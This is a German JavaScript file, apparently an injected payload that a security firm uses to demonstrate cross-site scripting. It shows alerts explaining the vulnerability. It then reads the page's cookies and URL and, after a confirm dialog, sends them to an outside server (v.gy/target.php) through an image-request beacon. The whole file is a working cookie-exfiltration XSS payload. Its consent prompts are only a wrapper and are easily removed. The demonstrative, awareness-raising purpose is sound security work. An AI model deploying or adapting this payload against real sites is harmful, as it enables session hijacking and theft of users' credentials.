var snl = '\n';
var snnl = snl + snl;
var snnnl = snnl + snl;

var shrow =
'-------------------------------------------------------------------------------------------\n';

var scookie = document.cookie;
var slocation = location.href;

if  (slocation.length <= 0) 
{
slocation = 'KONNTE - location.href - NICHT AUSLESEN!';
}

if  (scookie.length <= 0) 
{
scookie = 'KEINE COOKIE AUSLESBAR, SEHR GUT!';
}

var simpressum = 
'\tsic[!]sec GmbH' +snl + 
'\tIT-Sicherheit, Prozessoptimierung und Datenschutz ' +snnl +
'\tIndustriestrasse 29-31\tTel: +49-(0)8142-4425-030 ' + snl +
'\tD-82194 Groebenzell\t\tFax: +49-(0)8142-4425-039 ' +snl +
'\thttp://www.sicsec.de   \tmailto:info@sicsec.de'+ snl +
shrow + 
'\tSitz der Gesellschaft: Groebenzell, HRB 188159,' +snl +
'\tAmtsgericht Muenchen. Geschaeftsfuehrer:' + snl +
'\tAchim Hoffmann und Ralf Reinhardt';

var swarning =
'Dies ist eines Coss-Site Scriptings (XSS) Demonstration!' + snnl +
'Es handelt sich hierbei um JavaScript-Code eingeschleusst' + snl +
'von einem externen Server unter Kontrolle der:' + snnl + 
simpressum + snnnl +
'Bei Cross-Site Scripting handelt es sich um eine bekannte' +snl + 
'und leiter weit verbreitete Schwachstelle aus dem Bereich' + snl +
'der Web Application Security (WAS).' +snnl +
'Wir lesen, wenn Sie uns dies im Rahmen dieser Demon-'+ snl+ 
'stration erlauben und es technisch moeglich ist, als' +snl +
'naechstes die Cookies und den URL der Anwendung aus.' +snnl +
'Keine Sorge, noch ist bis auf diese Meldung - deren Existenz' +snl+
'aber fuer sich genommen bereits eine gravierende'+snl+
'Sicherheitsluecke(!) darstellt - nichts besonderes passiert.' +snl +
'Dem naechsten Schritt muessen Sie (in einem neuen Dialog)' +snl+
'explizit zustimmen, wenn Sie die Demo weiterfuehren wollen.' + snnl;

var ssendconfirmed =
'Das oder die Cookie(s) der Seite \'' + slocation + '\''+snnl + 
'laute(n): '+ '\'' +scookie + '\''+ snnl +
'Diese Infomationen koennen nun an unseren Server zur' + snl +
'weiteren Fortfuehrung dieser Demo gesendet werden.' + snnl +
'Oft ist mit diesen Session-Daten eine Uebernahme' +snl +
'der Session eines angemeldeten Benutzers (d.h. Ihre' +snl +
'Session, wenn Sie dies hier lesen!) moeglich.' +snl +
'Wenn Sie jetzt nicht angemeldet sind oder sich' +snl +
'nach dem Senden abmelden, so koenne die gesendeten' + snl +
'Daten nicht fuer eine Uebernahme genutzt werden.' + snnl +
'Wir werden die Daten streng vertraulich handhaben' + snl +
'und nicht missbraeuchlich verwenden.' + snnl +
'-  W I C H T I G !  -  W I C H T I G !  -  W I C H T I G !  -'+ snnl +
'HABEN SIE DAS OBIGE VERSTANDEN UND MOECHTEN SIE' + snl +
'IHRE SESSION-DATEN AN DIE SIC[!]SEC GMBH SENDEN?' + snnl +
simpressum + snnl;

alert (swarning);

if (confirm(ssendconfirmed))
{
var target = '//v.gy/target.php?';
var msgstring =
encodeURIComponent('##HREF##'+slocation+'##&##COOKIE##'+scookie+'##');
new Image().src = target+msgstring;
alert('Die Session-Daten wurden wie gewuenscht'+snl+'ans uns verschickt!' + snnl + 'Vielen Dank fuer Ihre Kooperation  : - )' + snnnl + simpressum + snnl);
}
else
{
alert('Die Fortfuehrung der Demonstration wurde'+ snl +'abgebrochen, es wurden keine Daten versendet...' + snnl + 'Schade  : - ('+
snnnl + simpressum + snnl);
}